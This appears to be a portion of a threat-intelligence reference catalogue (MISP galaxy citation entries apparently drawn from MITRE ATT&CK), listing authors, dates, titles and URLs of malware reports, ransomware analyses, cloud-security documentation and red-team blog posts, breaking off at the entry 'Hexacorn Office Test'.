Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Trend Micro njRAT 2018"

Table 12758. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/

Re-Open windows on Mac

Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Re-Open windows on Mac"

Table 12759. Table References

Links

https://support.apple.com/en-us/HT204005

TechNet Autoruns

Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet Autoruns"

Table 12760. Table References

Links

https://technet.microsoft.com/en-us/sysinternals/bb963902

Autoruns for Windows

Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Autoruns for Windows"

Table 12761. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Hornet Security Avaddon June 2020

Security Lab. (2020, June 5). Avaddon: From seeking affiliates to in-the-wild in 2 days. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Hornet Security Avaddon June 2020"

Table 12762. Table References

Links

https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/

Arxiv Avaddon Feb 2021

Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Arxiv Avaddon Feb 2021"

Table 12763. Table References

Links

https://arxiv.org/pdf/2102.04796.pdf

CISA Phishing

CISA. (2021, February 1). Avoiding Social Engineering and Phishing Attacks. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="CISA Phishing"

Table 12764. Table References

Links

https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks

Malwarebytes AvosLocker Jul 2021

Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Malwarebytes AvosLocker Jul 2021"

Table 12765. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

avoslocker_ransomware

Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="avoslocker_ransomware"

Table 12766. Table References

Links

https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html

Cisco Talos Avos Jun 2022

Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Cisco Talos Avos Jun 2022"

Table 12767. Table References

Links

https://blog.talosintelligence.com/avoslocker-new-arsenal/

Awesome Executable Packing

Alexandre D’Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Awesome Executable Packing"

Table 12768. Table References

Links

https://github.com/dhondta/awesome-executable-packing

ESET Kobalos Jan 2021

M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="ESET Kobalos Jan 2021"

Table 12769. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf

AWS Root User

Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="AWS Root User"

Table 12770. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

GitHub AWS-ADFS-Credential-Generator

Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.

The tag is: misp-galaxy:references="GitHub AWS-ADFS-Credential-Generator"

Table 12771. Table References

Links

https://github.com/damianh/aws-adfs-credential-generator

AWS GetPasswordPolicy

Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.

The tag is: misp-galaxy:references="AWS GetPasswordPolicy"

Table 12772. Table References

Links

https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html

AWS Console Sign-in Events

Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.

The tag is: misp-galaxy:references="AWS Console Sign-in Events"

Table 12773. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

AWS Describe DB Instances

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Describe DB Instances"

Table 12774. Table References

Links

https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html

AWS Get Bucket ACL

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Get Bucket ACL"

Table 12775. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html

AWS Get Public Access Block

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Get Public Access Block"

Table 12776. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html

AWS Head Bucket

Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="AWS Head Bucket"

Table 12777. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html

Rhino Security Labs AWS Privilege Escalation

Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs AWS Privilege Escalation"

Table 12778. Table References

Links

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

AWS Lambda Redirector

Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="AWS Lambda Redirector"

Table 12779. Table References

Links

https://blog.xpnsec.com/aws-lambda-redirector/

Rhino Security Labs AWS S3 Ransomware

Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Rhino Security Labs AWS S3 Ransomware"

Table 12780. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

AWS Systems Manager Run Command

AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AWS Systems Manager Run Command"

Table 12781. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html

Pylos Xenotime 2019

Slowik, J. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Pylos Xenotime 2019"

Table 12782. Table References

Links

https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/

objective-see ay mami 2018

Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="objective-see ay mami 2018"

Table 12783. Table References

Links

https://objective-see.com/blog/blog_0x26.html

Microsoft AZ CLI

Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft AZ CLI"

Table 12784. Table References

Links

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

Intezer Russian APT Dec 2020

Kennedy, J. (2020, December 9). A Zebra in Gopher’s Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Intezer Russian APT Dec 2020"

Table 12785. Table References

Links

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

az monitor diagnostic-settings

Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="az monitor diagnostic-settings"

Table 12786. Table References

Links

https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete

Microsoft Azure AD Security Operations for Devices

Microsoft. (2020, September 16). Azure Active Directory security operations for devices. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure AD Security Operations for Devices"

Table 12787. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices

Microsoft Azure Active Directory security operations guide

Microsoft. (2022, September 16). Azure Active Directory security operations guide. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Active Directory security operations guide"

Table 12788. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-introduction

Azure AD Connect for Read Teamers

Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD Connect for Read Teamers"

Table 12789. Table References

Links

https://blog.xpnsec.com/azuread-connect-for-redteam/

Microsoft - Azure PowerShell

Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Microsoft - Azure PowerShell"

Table 12790. Table References

Links

https://github.com/Azure/azure-powershell

Azure Blob Storage

Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Azure Blob Storage"

Table 12791. Table References

Links

https://azure.microsoft.com/en-us/services/storage/blobs/

Microsoft Azure Instance Metadata 2021

Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.

The tag is: misp-galaxy:references="Microsoft Azure Instance Metadata 2021"

Table 12792. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows

Microsoft Azure Policy

Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Policy"

Table 12793. Table References

Links

https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute

SpecterOps Azure Privilege Escalation

Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="SpecterOps Azure Privilege Escalation"

Table 12794. Table References

Links

https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5

Azure Products

Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Azure Products"

Table 12795. Table References

Links

https://azure.microsoft.com/en-us/services/

Azure - Resource Manager API

Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure - Resource Manager API"

Table 12796. Table References

Links

https://docs.microsoft.com/en-us/rest/api/resources/

Mandiant Azure Run Command 2021

Adrien Bataille, Anders Vejlby, Jared Scott Wilson, and Nader Zaveri. (2021, December 14). Azure Run Command for Dummies. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Mandiant Azure Run Command 2021"

Table 12797. Table References

Links

https://www.mandiant.com/resources/blog/azure-run-command-dummies

Microsoft Azure security baseline for Azure Active Directory

Microsoft. (2022, November 14). Azure security baseline for Azure Active Directory. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure security baseline for Azure Active Directory"

Table 12798. Table References

Links

https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline

Microsoft - Azure Sentinel ADFSDomainTrustMods

Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Azure Sentinel ADFSDomainTrustMods"

Table 12799. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

Azure Serial Console

Microsoft. (2022, October 17). Azure Serial Console. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="Azure Serial Console"

Table 12800. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview

Microsoft Azure Storage Security, 2019

Amlekar, M., Brooks, C., Claman, L., et al. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Azure Storage Security, 2019"

Table 12801. Table References

Links

https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide

Azure - Stormspotter

Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure - Stormspotter"

Table 12802. Table References

Links

https://github.com/Azure/Stormspotter

Medium Babuk February 2021

Sebdraven. (2021, February 8). Babuk is distributed packed. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Medium Babuk February 2021"

Table 12803. Table References

Links

https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62

Sogeti CERT ESEC Babuk March 2021

Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Sogeti CERT ESEC Babuk March 2021"

Table 12804. Table References

Links

https://www.sogeti.com/globalassets/reports/cybersecchronicles-_babuk.pdf

Unit42 BabyShark Apr 2019

Lim, M. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat. Retrieved October 7, 2019.

The tag is: misp-galaxy:references="Unit42 BabyShark Apr 2019"

Table 12805. Table References

Links

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

Symantec Briba May 2012

Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.

The tag is: misp-galaxy:references="Symantec Briba May 2012"

Table 12806. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99

TrendMicro Squiblydoo Aug 2017

Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="TrendMicro Squiblydoo Aug 2017"

Table 12807. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

Symantec Darkmoon Aug 2005

Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Darkmoon Aug 2005"

Table 12808. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99

ESET BackdoorDiplomacy Jun 2021

Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021.

The tag is: misp-galaxy:references="ESET BackdoorDiplomacy Jun 2021"

Table 12809. Table References

Links

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Backdooring an AWS account

Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Backdooring an AWS account"

Table 12810. Table References

Links

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

Symantec Linfo May 2012

Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Linfo May 2012"

Table 12811. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99

Symantec Backdoor.Mivast

Stama, D. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Symantec Backdoor.Mivast"

Table 12812. Table References

Links

http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2

Symantec Nerex May 2012

Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Nerex May 2012"

Table 12813. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99

Symantec Backdoor.Nidiran

Sponchioni, R. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Backdoor.Nidiran"

Table 12814. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99

Symantec Remsec IOCs

Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Remsec IOCs"

Table 12815. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf

Symantec Ristol May 2012

Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Ristol May 2012"

Table 12816. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99

Symantec Vasport May 2012

Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Vasport May 2012"

Table 12817. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99

FSecure Hupigon

FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="FSecure Hupigon"

Table 12818. Table References

Links

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

Symantec Wiarp May 2012

Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Wiarp May 2012"

Table 12819. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99

Microsoft Lamin Sept 2017

Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Microsoft Lamin Sept 2017"

Table 12820. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Microsoft PoisonIvy 2017

McCormack, M. (2017, September 15). Backdoor:Win32/Poisonivy.E. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Microsoft PoisonIvy 2017"

Table 12821. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3aWin32%2fPoisonivy.E

Microsoft Win Defender Truvasys Sep 2017

Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Win Defender Truvasys Sep 2017"

Table 12822. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha

Microsoft Wingbird Nov 2017

Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Wingbird Nov 2017"

Table 12823. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha

Microsoft BITS

Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft BITS"

Table 12824. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

NCC Group Research Blog August 19 2022

NCC Group Research Blog. (2022, August 19). Back in Black: Unlocking a LockBit 3.0 Ransomware Attack. Retrieved May 7, 2023.

The tag is: misp-galaxy:references="NCC Group Research Blog August 19 2022"

Table 12825. Table References

Links

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

Tech Republic - Restore AWS Snapshots

Hardiman, N. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Tech Republic - Restore AWS Snapshots"

Table 12826. Table References

Links

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Secureworks COBALT DICKENS August 2018

Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT DICKENS August 2018"

Table 12827. Table References

Links

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

Cybereason Kimsuky November 2020

Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.

The tag is: misp-galaxy:references="Cybereason Kimsuky November 2020"

Table 12828. Table References

Links

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Proofpoint TA453 March 2021

Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.

The tag is: misp-galaxy:references="Proofpoint TA453 March 2021"

Table 12829. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

Unit 42 BadPatch Oct 2017

Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit 42 BadPatch Oct 2017"

Table 12830. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/

ESET Bad Rabbit

M.Léveille, M-E. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="ESET Bad Rabbit"

Table 12831. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

Secure List Bad Rabbit

Mamedov, O., Sinitsyn, F., Ivanov, A. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="Secure List Bad Rabbit"

Table 12832. Table References

Links

https://securelist.com/bad-rabbit-ransomware/82851/

BlackBerry Bahamut

The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="BlackBerry Bahamut"

Table 12833. Table References

Links

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf

BaltimoreSun RobbinHood May 2019

Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.

The tag is: misp-galaxy:references="BaltimoreSun RobbinHood May 2019"

Table 12834. Table References

Links

https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html

CheckPoint Bandook Nov 2020

Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.

The tag is: misp-galaxy:references="CheckPoint Bandook Nov 2020"

Table 12835. Table References

Links

https://research.checkpoint.com/2020/bandook-signed-delivered/

Banker Google Chrome Extension Steals Creds

Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.

The tag is: misp-galaxy:references="Banker Google Chrome Extension Steals Creds"

Table 12836. Table References

Links

https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/

Unit42 Banking Trojans Hooking 2022

Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Unit42 Banking Trojans Hooking 2022"

Table 12837. Table References

Links

https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n

Linux manual bash invocation

ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Linux manual bash invocation"

Table 12838. Table References

Links

https://wiki.archlinux.org/index.php/Bash#Invocation

DieNet Bash

die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.

The tag is: misp-galaxy:references="DieNet Bash"

Table 12839. Table References

Links

https://linux.die.net/man/1/bash

Bash.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bash.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bash.exe - LOLBAS Project"

Table 12840. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bash/

Bashfuscator Command Obfuscators

LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Bashfuscator Command Obfuscators"

Table 12841. Table References

Links

https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html

Microsoft Basic TxF Concepts

Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft Basic TxF Concepts"

Table 12842. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

BATLOADER: The Evasive Downloader Malware

Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht. (2022, November 14). BATLOADER: The Evasive Downloader Malware. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="BATLOADER: The Evasive Downloader Malware"

Table 12843. Table References

Links

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

Palo Alto Networks BBSRAT

Lee, B., Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.

The tag is: misp-galaxy:references="Palo Alto Networks BBSRAT"

Table 12844. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

Microsoft bcdedit 2021

Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Microsoft bcdedit 2021"

Table 12845. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit

Securelist BlackEnergy Nov 2014

Baumgartner, K. and Garnaeva, M. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Securelist BlackEnergy Nov 2014"

Table 12846. Table References

Links

https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/

Securelist BlackEnergy Feb 2015

Baumgartner, K. and Garnaeva, M. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Securelist BlackEnergy Feb 2015"

Table 12847. Table References

Links

https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/

Crowdstrike DNC June 2016

Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Crowdstrike DNC June 2016"

Table 12848. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Deep Instinct Black Basta August 2022

Vilkomir-Preisman, S. (2022, August 18). Beating Black Basta Ransomware. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Deep Instinct Black Basta August 2022"

Table 12849. Table References

Links

https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence

Bienstock, D. - Defending O365 - 2019

Bienstock, D. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Bienstock, D. - Defending O365 - 2019"

Table 12850. Table References

Links

https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365

Kevin Mandia Statement to US Senate Committee on Intelligence

Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Kevin Mandia Statement to US Senate Committee on Intelligence"

Table 12851. Table References

Links

https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf

Microsoft Dofoil 2018

Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="Microsoft Dofoil 2018"

Table 12852. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

FireEye CARBANAK June 2017

Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="FireEye CARBANAK June 2017"

Table 12853. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

Expel Behind the Scenes

A. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="Expel Behind the Scenes"

Table 12854. Table References

Links

https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/

Microsoft BEC Campaign

Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.

The tag is: misp-galaxy:references="Microsoft BEC Campaign"

Table 12855. Table References

Links

https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

Unit42 BendyBear Feb 2021

Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.

The tag is: misp-galaxy:references="Unit42 BendyBear Feb 2021"

Table 12856. Table References

Links

https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/

Google Cloud Storage Best Practices, 2019

Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Google Cloud Storage Best Practices, 2019"

Table 12857. Table References

Links

https://cloud.google.com/storage/docs/best-practices

Shadowbunny VM Defense Evasion

Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Shadowbunny VM Defense Evasion"

Table 12858. Table References

Links

https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/

Hexacorn Office Test

